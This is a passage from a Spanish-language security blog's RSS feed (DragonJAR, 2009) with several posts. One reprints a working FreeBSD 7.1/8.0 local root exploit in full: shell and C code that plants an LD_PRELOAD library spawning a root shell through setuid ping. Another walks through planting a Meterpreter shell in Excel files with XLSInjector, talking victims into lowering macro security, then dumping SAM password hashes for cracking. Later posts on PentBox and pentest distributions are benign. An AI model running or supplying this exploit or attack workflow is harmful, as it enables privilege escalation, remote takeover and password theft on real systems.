Seguridad en tu USB">Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a href="http://www.dragonjar.org/manual-de-metasploit-framework.xhtml" title="Curso Completo de Metasploit Framework">Curso Completo de Metasploit Framework</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/foro-de-backtrack-en-espanol.xhtml/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Fallo en FreeBSD permite obtener root</title>
		<link>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml</link>
		<comments>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml#comments</comments>
		<pubDate>Tue, 01 Dec 2009 08:54:39 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[BSD]]></category>
		<category><![CDATA[FreeBSD]]></category>
		<category><![CDATA[sistema]]></category>
		<category><![CDATA[variables]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3442</guid>
		<description><![CDATA[Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo.

El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla [...]]]></description>
			<content:encoded><![CDATA[<p>Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo.</p>
<p style="text-align: center;"><img class="alignnone" title="Bug en FreeBSD" src="http://imgur.com/HNx9D.jpg" alt="HNx9D Fallo en FreeBSD permite obtener root" width="200" height="223" /></p>
<p>El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte variables LD, incluso en los binarios setugid.<span id="more-3442"></span><br />
VERSIONES DE FREEBSD AFECTADAS<br />
**********************************<br />
FreeBSD 8.0-RELEASE *** VULNERABLE<br />
FreeBSD 7.1-RELEASE *** VULNERABLE<br />
FreeBSD 6.3-RELEASE *** NO VULNERABLE<br />
FreeBSD 4.9-RELEASE *** NO VULNERABLE</p>
<p>Para más detalles ver el exploit.</p>
<p><code>#!/bin/sh<br />
echo ** FreeBSD local r00t zeroday<br />
echo by Kingcope<br />
echo November 2009<br />
cat &gt; env.c &lt;&lt; _EOF<br />
#include </code></p>
<p><code>main() {<br />
extern char **environ;<br />
environ = (char**)malloc(8096);</code></p>
<p><code>environ[0] = (char*)malloc(1024);<br />
environ[1] = (char*)malloc(1024);<br />
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");</code></p>
<p><code>execl("/sbin/ping", "ping", 0);<br />
}<br />
_EOF<br />
gcc env.c -o env<br />
cat &gt; program.c &lt;&lt; _EOF<br />
#include<br />
#include<br />
#include<br />
#include</code></p>
<p><code>void _init() {<br />
extern char **environ;<br />
environ=NULL;<br />
system("echo ALEX-ALEX;/bin/sh");<br />
}<br />
_EOF</code></p>
<p>Para compilar y ejecutar</p>
<p><code>gcc -o program.o -c program.c -fPIC<br />
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles<br />
cp w00t.so.1.0 /tmp/w00t.so.1.0<br />
./env</code></p>
<p>Mas Información en el <a rel="nofollow" target="_blank" href="http://seclists.org/fulldisclosure/2009/Nov/371">Full Disclosure publicado por Nikolaos Rangos</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>XLSInjector &#8211; Inyectar Shell Meterpreter en Archivos Excel</title>
		<link>http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml</link>
		<comments>http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml#comments</comments>
		<pubDate>Thu, 26 Nov 2009 02:31:56 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[consola]]></category>
		<category><![CDATA[Documentos]]></category>
		<category><![CDATA[Ejecución]]></category>
		<category><![CDATA[meterpreter]]></category>
		<category><![CDATA[microsoft excel]]></category>
		<category><![CDATA[Shell]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3433</guid>
		<description><![CDATA[Para nadie es un secreto que la suite ofimática mas utilizada en el mundo es Microsoft Office, que se lleva la mayor parte de la cuota de mercado en entornos Windows y Mac, de esta suite, las aplicaciones mas utilizadas son Microsoft Word, Microsoft Excel y Microsoft Power Point que casi siempre están instaladas en [...]]]></description>
			<content:encoded><![CDATA[<p>Para nadie es un secreto que la suite ofimática mas utilizada en el mundo es Microsoft Office, que se lleva la mayor parte de la cuota de mercado en entornos Windows y Mac, de esta suite, las aplicaciones mas utilizadas son Microsoft Word, Microsoft Excel y Microsoft Power Point que casi siempre están instaladas en la mayoría de computadores.</p>
<p>En esta ocasión les voy a hablar sobre <a rel="nofollow" target="_blank" href="http://code.google.com/p/xlsinjector/">XLSInjector</a>, una herramienta creada en perl por <a rel="nofollow" target="_blank" style="white-space: nowrap;" href="http://code.google.com/u/keith.lee2012/">keith lee</a> que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.</p>
<p style="text-align: center;"><img class="alignnone" title="Shell en Microsoft Excel" src="http://farm3.static.flickr.com/2504/4141619399_6369cd84b7.jpg" alt="4141619399 6369cd84b7 XLSInjector   Inyectar Shell Meterpreter en Archivos Excel" width="357" height="172" /></p>
<p>Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:</p>
<ul>
<li>Una Maquina (virtual o real) con Windows</li>
<li>Microsoft Excel</li>
<li><a rel="nofollow" target="_blank" href="http://www.activestate.com/activeperl/">Perl</a></li>
<li>El modulo <a rel="nofollow" target="_blank" href="http://search.cpan.org/CPAN/authors/id/J/JD/JDB/Win32-OLE-0.1709.tar.gz">Win32:OLE</a> para Perl</li>
<li>Un archivo XML a infectar</li>
<li>El <a rel="nofollow" target="_blank" href="http://code.google.com/p/xlsinjector/">XLSInjector</a></li>
<li>y por ultimo el <a rel="nofollow" target="_blank" href="http://www.metasploit.com/">Metasploit Framework</a></li>
</ul>
<p>Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:<span id="more-3433"></span></p>
<p><code>perl xlsinjector.pl -i ArchivoDeExcel.xls  -o ArchivoConShellDeExcel.xls</code></p>
<p>Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que &#8220;confié&#8221; en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.</p>
<p>Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework</p>
<ul>
<li>iniciamos la consola del metasploit</li>
<li>una vez en la consola de MSF cargamos el payload de meterpreter<br />
<code>set payload windows/meterpreter/bind_tcp</code></li>
<li>lo configuramos adecuadamente<br />
<code>set RHOST ipdelpcvictima<br />
set RPOT 4444</code></li>
<li>luego lo lanzamos<br />
<code>exploit</code></li>
</ul>
<p>Con estos simples pasos tenemos a nuestra disposición una shell meterpreter en el equipo remoto, hay que recordar que las shell meterpreter son diferentes a las del sistema operativo, y tienen su propio listado de comandos, puedes sacar el listado de comandos disponibles para la shell meterpreter escribiendo &#8220;?&#8221; y enter, te arrojara algo parecido a esto:</p>
<blockquote><p><code>Core Commands<br />
=============</code></p>
<p><code>Command       Description<br />
——-       ———–<br />
?             Help menu<br />
channel       Displays information about active channels<br />
close         Closes a channel<br />
exit          Terminate the meterpreter session<br />
help          Help menu<br />
interact      Interacts with a channel<br />
irb           Drop into irb scripting mode<br />
migrate       Migrate the server to another process<br />
quit          Terminate the meterpreter session<br />
read          Reads data from a channel<br />
run           Executes a meterpreter script<br />
use           Load a one or more meterpreter extensions<br />
write         Writes data to a channel</code></p>
<p><code>Stdapi: File system Commands<br />
============================</code></p>
<p><code>Command       Description<br />
——-       ———–<br />
cat           Read the contents of a file to the screen<br />
cd            Change directory<br />
download      Download a file or directory<br />
edit          Edit a file<br />
getlwd        Print local working directory<br />
getwd         Print working directory<br />
lcd           Change local working directory<br />
lpwd          Print local working directory<br />
ls            List files<br />
mkdir         Make directory<br />
pwd           Print working directory<br />
rmdir         Remove directory<br />
upload        Upload a file or directory</code></p>
<p><code>Stdapi: Networking Commands<br />
===========================</code></p>
<p><code>Command       Description<br />
——-       ———–<br />
ipconfig      Display interfaces<br />
portfwd       Forward a local port to a remote service<br />
route         View and modify the routing table</code></p>
<p><code>Stdapi: System Commands<br />
=======================</code></p>
<p><code>Command       Description<br />
——-       ———–<br />
execute       Execute a command<br />
getpid        Get the current process identifier<br />
getuid        Get the user that the server is running as<br />
kill          Terminate a process<br />
ps            List running processes<br />
reboot        Reboots the remote computer<br />
reg           Modify and interact with the remote registry<br />
rev2self      Calls RevertToSelf() on the remote machine<br />
shutdown      Shuts down the remote computer<br />
sysinfo       Gets information about the remote system, such as OS</code></p>
<p><code>Stdapi: User interface Commands<br />
===============================</code></p>
<p><code>Command       Description<br />
——-       ———–<br />
idletime      Returns the number of seconds the remote user has been idle<br />
uictl         Control some of the user interface components</code></p>
<p><code>Priv: Password database Commands<br />
================================</code></p>
<p><code>Command       Description<br />
——-       ———–<br />
hashdump      Dumps the contents of the SAM database</code></p>
<p><code>Priv: Timestomp Commands<br />
========================</code></p>
<p><code>Command       Description<br />
——-       ———–<br />
timestomp     Manipulate file MACE attributes </code></p></blockquote>
<p>Hay que resaltar la potencia de meterpreter para inyectar dll’s, subir ficheros, ejecutar scripts, te recomiendo que le des una leída a estos documentos (<a rel="nofollow" target="_blank" href="http://www.nologin.org/Downloads/Papers/meterpreter.pdf">Meterpreter.pdf</a> y <a rel="nofollow" target="_blank" href="http://www.learnsecurityonline.com/vid/MSF3-met/MSF3-met.html">MSF3-met.html</a>) para que aprendas mas sobre los comandos del meterpreter.</p>
<p>Te recomiendo utilizar el comando <code>migrate</code> tan pronto puedas para evitar que tan pronto cierren el archivo XLS se cierre con el tu shell, otro comando recomendado es <code>hashdump</code> que te arroja el contenido del archivo SAM en la maquina victima para que posteriormente puedas obtener la clave de los usuarios con herramientas como <a rel="nofollow" target="_blank" href="http://www.l0phtcrack.com/">l0phtcrack</a> o <a rel="nofollow" target="_blank" href="http://www.oxid.it/cain.html">cain&amp;abel</a>.</p>
<p>Por ultimo les dejo el video del autor, donde nos enseña el funcionamiento del XLSInjector</p>
<p id="preview" style="text-align: center;"><object id="player" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="564" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="name" value="player" /><param name="flashvars" value="file=http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4" /><param name="src" value="http://miliw0rm.securitytube.net/player.swf" /><param name="allowfullscreen" value="true" /><param name="quality" value="high" /><embed id="player" type="application/x-shockwave-flash" width="640" height="564" src="http://miliw0rm.securitytube.net/player.swf" quality="high" allowfullscreen="true" flashvars="file=http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4" name="player"></embed></object></p>
<p><script src="http://miliw0rm.securitytube.net/swfobject.js" type="text/javascript"></script> <script type="text/javascript">// <![CDATA[
   var s1 = new SWFObject('http://miliw0rm.securitytube.net/player.swf','player','640','564','9'); s1.addParam('allowfullscreen','true'); s1.addParam('allowscriptaccess','always'); s1.addParam('flashvars','file=http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4'); s1.write('preview');
// ]]&gt;</script></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/metasploit-framework.xhtml" title="Metasploit Framework 3.3.2">Metasploit Framework 3.3.2</a></li><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a href="http://www.dragonjar.org/zsh-una-shell-interactiva-mas-amigable-para-el-usuario.xhtml" title="zsh: Una shell interactiva más amigable para el usuario">zsh: Una shell interactiva más amigable para el usuario</a></li><li><a href="http://www.dragonjar.org/firmando-documentos-y-correos-con-gpg.xhtml" title="Firmando Documentos y Correos con GPG">Firmando Documentos y Correos con GPG</a></li><li><a href="http://www.dragonjar.org/cursos-gratis-de-informatica-en-el-sena-virtual.xhtml" title="Cursos Gratis de Informática en el Sena Virtual">Cursos Gratis de Informática en el Sena Virtual</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
<enclosure url="http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4" length="7702120" type="video/mp4" />
		</item>
		<item>
		<title>PentBox &#8211; Una suite de seguridad y pentesting en ruby</title>
		<link>http://www.dragonjar.org/pentbox-una-suite-de-seguridad-y-pentesting-en-ruby.xhtml</link>
		<comments>http://www.dragonjar.org/pentbox-una-suite-de-seguridad-y-pentesting-en-ruby.xhtml#comments</comments>
		<pubDate>Thu, 27 Aug 2009 04:05:02 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Herramienta]]></category>
		<category><![CDATA[Ruby]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Seguridad Informática]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3033</guid>
		<description><![CDATA[PenTBox es una Suite de Seguridad orientada a Penetration_test , de ahí su nombre Penetration Testing Box. Esta programada en un lenguaje interpretado, Ruby que le permite ser multiplataforma y tener un código bastante claro. El código esta liberado bajo licencia GNU GPL v3.

La idea principal es que es un conjunto de programas, que pueden [...]]]></description>
			<content:encoded><![CDATA[<p>PenTBox es una Suite de Seguridad orientada a<a rel="nofollow" target="_blank" title="Penetration_test" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_en_wikipedia_org_wiki_Penetration_test');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://en.wikipedia.org/wiki/Penetration_test" target="_blank"> Penetration_test</a> , de ahí su nombre Penetration Testing Box. Esta programada en un lenguaje interpretado, <a rel="nofollow" target="_blank" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_www_ruby_lang_org_es_');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.ruby-lang.org/es/" target="_blank">Ruby</a> que le permite ser multiplataforma y tener un código bastante claro. El código esta liberado bajo licencia <a rel="nofollow" target="_blank" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_www_gnu_org_licenses_gpl_3_0_html');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.gnu.org/licenses/gpl-3.0.html" target="_blank">GNU GPL v3</a>.</p>
<p style="text-align: center;"><strong><img class="aligncenter" src="http://www.pentbox.net/wp-content/uploads/2009/08/logo2.png" border="0" alt="logo2 PentBox   Una suite de seguridad y pentesting en ruby"  title="PentBox   Una suite de seguridad y pentesting en ruby" /></strong></p>
<p>La idea principal es que es un conjunto de programas, que pueden ser ejecutados individualmente, sin dependencia de la Suite en sí. Además, el proyecto puede ir creciendo fácilmente grácias a la comunidad, por lo fácil que es implementar nuevos programas individualmente.<span id="more-3033"></span><br />
El programa es multiplataforma, pero esta orientado a sistemas <a rel="nofollow" target="_blank" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_es_wikipedia_org_wiki_GNU_Linux');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://es.wikipedia.org/wiki/GNU/Linux" target="_blank">GNU/Linux</a>. Todas las pruebas se hacen sobre estos y solo a estos se les da un soporte y una garantía de que todo debería funcionar bien. Aún así, PenTBox se puede ejecutar en todos los sistemas que soportan Ruby (MacOS, BSD, DOS, BeOS, OS/2 y más), además de haber desarrollado también una versión funcional para Windows. Se intentan probar todas las funciones en la mayoría de los sistemas soportados, pero como es comprensible no siempre es posible.<!--more--><br />
<strong>¿Y, que programas incluye PenTBox?</strong><br />
Según escribo este artículo, solo existe la versión 1.0 Beta de PenTBox. En líneas generales, el programa tiene las siguientes funciones:</p>
<ul>
<li>Crackeador de Hash MD5, SHA1, SHA256 y SHA512 mediante fuerza bruta numérica.</li>
<li>Creador rápido de
<div id="ame_doshow_post_1251685217_3" style="display: inline;"><a rel="nofollow" target="_blank" title="Honeypot" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_es_wikipedia_org_wiki_Honeypot');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://es.wikipedia.org/wiki/Honeypot" target="_blank"> Honeypot</a>.</div>
</li>
<li>Generador de contraseñas seguras ante <a rel="nofollow" target="_blank" title="Ataque_de_fuerza_bruta" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_es_wikipedia_org_wiki_Ataque_de_fuerza_bruta');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://es.wikipedia.org/wiki/Ataque_de_fuerza_bruta" target="_blank"> Ataque_de_fuerza_bruta</a> y
<div id="ame_noshow_post_1251685217_5" style="display: none;"><a rel="nofollow" target="_blank" title="diccionario" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_es_wikipedia_org_wiki_Ataque_de_diccionario');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://es.wikipedia.org/wiki/Ataque_de_diccionario" target="_blank">diccionario</a></div>
<div id="ame_doshow_post_1251685217_5" style="display: inline;"><a rel="nofollow" target="_blank" title="Ataque_de_diccionario" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_es_wikipedia_org_wiki_Ataque_de_diccionario');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://es.wikipedia.org/wiki/Ataque_de_diccionario" target="_blank"> Ataque_de_diccionario</a>.</div>
</li>
<li>Generadores de tráfico masivo en la red para probar posibles <a rel="nofollow" target="_blank" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_es_wikipedia_org_wiki_Ataque_de_denegaci_C3_B3n_de_servicio');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://es.wikipedia.org/wiki/Ataque_de_denegaci%C3%B3n_de_servicio" target="_blank">denegaciones de servicio</a>.</li>
<li>Escáner de puertos.</li>
<li>Otras aplicaciones complementarias o menores …</li>
</ul>
<p><strong>¿A quién puede serle útil PenTBox?</strong><br />
Tiene un gran sector de público posible. Desde usuarios con conocimientos limitados, que necesitan crear contraseñas seguras o aprender procedimientos de seguridad hasta administradores de sistemas informáticos, que necesiten crear un Honeypot rápido o probar la estabilidad de su red con herramientas de denegación de servicio.</p>
<p>Además de desarrolladores que quieran estudiar el código o la estabilidad de sus aplicaciones, aficionados o expertos en seguridad informática, etcétera.</p>
<h2>Instalando PentBox en Nuestro PC</h2>
<p>Primero vamos a la zona de descargas de PentBox <a rel="nofollow" target="_blank" onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_www_pentbox_net_download_pentbox_');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.pentbox.net/download-pentbox/" target="_blank"> Zona de Descargas</a><br />
Nos bajamos el paquete para Windows por ejemplo.  Primero instalamos el paquete ruby:</p>
<p style="text-align: center;"><img class="aligncenter" src="http://seifreed.files.wordpress.com/2009/08/instalacion_ryby.png?w=500&amp;h=356" border="0" alt=" PentBox   Una suite de seguridad y pentesting en ruby"  title="PentBox   Una suite de seguridad y pentesting en ruby" /></p>
<p>Deespués de instalar el paquete de Ruby ejecutamos el loader.bat<br />
Nos ha de salir algo así:</p>
<p style="text-align: center;"><img class="aligncenter" src="http://seifreed.files.wordpress.com/2009/08/pantalla.png?w=500&amp;h=356" border="0" alt=" PentBox   Una suite de seguridad y pentesting en ruby"  title="PentBox   Una suite de seguridad y pentesting en ruby" /></p>
<p><a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f151/pentbox-suite-de-seguridad-y-pentesting-8219/#post18552">Continuar leyendo en el foro</a>&#8230;</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.pentbox.net/">Pagina Oficial del Proyecto</a><br />
<a rel="nofollow" target="_blank" href="http://zombiesaresexy.wordpress.com">Pagina del Autor</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/katana-multiples-distribuciones-de-seguridad-en-tu-usb.xhtml" title="Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB">Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a href="http://www.dragonjar.org/varias-distribuciones-live-cd-de-seguridad-en-un-dvd.xhtml" title="Varias Distribuciones Live CD de Seguridad en un DVD">Varias Distribuciones Live CD de Seguridad en un DVD</a></li><li><a href="http://www.dragonjar.org/video-tutorial-honeypot.xhtml" title="Vídeo Tutorial Honeypot">Vídeo Tutorial Honeypot</a></li><li><a href="http://www.dragonjar.org/pastel-chancuco-chuletas-seguridad-informatica.xhtml" title="Pastel, Cheet Sheets, Chuletas en la Seguridad Informática">Pastel, Cheet Sheets, Chuletas en la Seguridad Informática</a></li><li><a href="http://www.dragonjar.org/x-25-conferencia-de-seguridad-informatica-en-mexico.xhtml" title="X.25 Conferencia de Seguridad Informática en Mexico">X.25 Conferencia de Seguridad Informática en Mexico</a></li><li><a href="http://www.dragonjar.org/ciberterrorismo.xhtml" title="Ciberterrorismo">Ciberterrorismo</a></li><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/donde-estudiar-seguridad-informatica-colombia.xhtml" title="¿Dónde estudiar seguridad informática en Colombia?">¿Dónde estudiar seguridad informática en Colombia?</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/pentbox-una-suite-de-seguridad-y-pentesting-en-ruby.xhtml/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>5 Distribuciones GNU/Linux para Pentesting</title>
		<link>http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml</link>
		<comments>http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml#comments</comments>
		<pubDate>Tue, 09 Jun 2009 18:21:32 +0000</pubDate>
		<dc:creator>Cortex</dc:creator>
				<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Proyectos]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Auditoria]]></category>
		<category><![CDATA[Distribucion]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad Informática]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2494</guid>
		<description><![CDATA[Para nadie es un secreto que a menudo las distribuciones GNU/Linux sean preferidas por los pentesters para llevar acabo auditorías. Y no es que desde otros sistemas operativos no sea posible, sino que generalmente las distros vienen mejor equipadas debido a que se puede, usando una ya creada, personalizarla hasta el punto que nosotros queramos [...]]]></description>
			<content:encoded><![CDATA[<p>Para nadie es un secreto que a menudo las <a title="GNU/Linux DragonJAR" href="http://www.dragonjar.org/category/gnulinux"><strong>distribuciones GNU/Linux</strong></a> sean preferidas por los <a title="Pentest DragonJAR" href="http://www.dragonjar.org/category/pentest"><strong>pentesters</strong></a> para llevar acabo <a title="Auditoría DragonJAR" href="http://www.dragonjar.org/tag/auditoria"><strong>auditorías</strong></a>. Y no es que desde otros<strong> sistemas operativos</strong> no sea posible, sino que generalmente las distros vienen mejor equipadas debido a que se puede, usando una ya creada, personalizarla hasta el punto que nosotros queramos permitiendo añadirle/quitarle las aplicaciones que queramos, modificar la configuración, añadirle módulos y mucho más. Además si le agregamos el hecho de poder <a title=" Los Mejores Live CD’s de Seguridad en un Solo DVD " href="http://www.dragonjar.org/los-mejores-live-cds-de-seguridad-en-un-solo-dvd.xhtml"><strong>ejecutar todo desde un CD</strong> sin necesidad de instalar nada en el disco</a>, la balanza se inclinaría aún más hacia el lado Linux. De cualquier manera, como resalté antes también hay muchísimas herramientas disponibles por ejemplo para <strong>Windows</strong> que facilitan el trabajo a la hora de una auditoría.</p>
<p>En este post vamos a enfocarnos en el repaso de algunas de las <a title="5 Distribuciones GNU/Linux para Pentesting" href="http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml">mejores distribuciones enfocadas a la </a><strong><a title="5 Distribuciones GNU/Linux para Pentesting" href="http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml">Seguridad Informática</a>.</strong></p>
<p><span id="more-2494"></span></p>
<p><strong>1. <a rel="nofollow" target="_blank" title="Backtrack DragonJAR" href="http://www.remote-exploit.org/backtrack.html">BackTrack</a></strong></p>
<p>Sería algo imposible escribir una lista de distribuciones enfocadas a la Seguridad sin hacer mención de Backtrack. Si eres lector asiduo del blog seguramente ya la conoces, <a rel="nofollow" target="_blank" title="4v4t4r" href="http://www.dragonjar.org/author/4v4t4r"><strong>4v4t4r</strong></a> ha realizado muchos <strong>laboratorios</strong> haciendo uso de esta distro. La última versión disponible (a la hora de escribir el artículo) es la <strong>4 BETA</strong>. Con más de 300 herramientas que la convierte en la distribución preferida por los pentesters. Actualmente basada en <strong>Debian/Ubuntu</strong> con unos amplios repositorios que permiten extender aún más su funcionalidad. <a title="Backtrack DragonJAR" href="http://www.dragonjar.org/tag/backtrack">Tanto en este blog</a> como en el de los <a title="Labs DragonJAR Backtrack" href="http://labs.dragonjar.org/category/backtrack">Laboratorios DragonJAR</a> encontrarás <strong>mucha información</strong> sobre el uso de esta distribución.</p>
<p><a rel="nofollow" target="_blank" title="Backtrack Download" href="http://www.remote-exploit.org/backtrack_download.html">Descargar Backtrack</a></p>
<p style="text-align: center;"><img class="alignnone" title="BackTrack 4" src="http://img199.imageshack.us/img199/543/backtrack44302164.png" alt="backtrack44302164 5 Distribuciones GNU/Linux para Pentesting" width="522" height="391" /></p>
<p style="text-align: center;">
<p style="text-align: left;"><strong>2.<a rel="nofollow" target="_blank" title="nUbuntu" href="http://www.nubuntu.org/"> nUbuntu (Network Ubuntu)</a><br />
</strong></p>
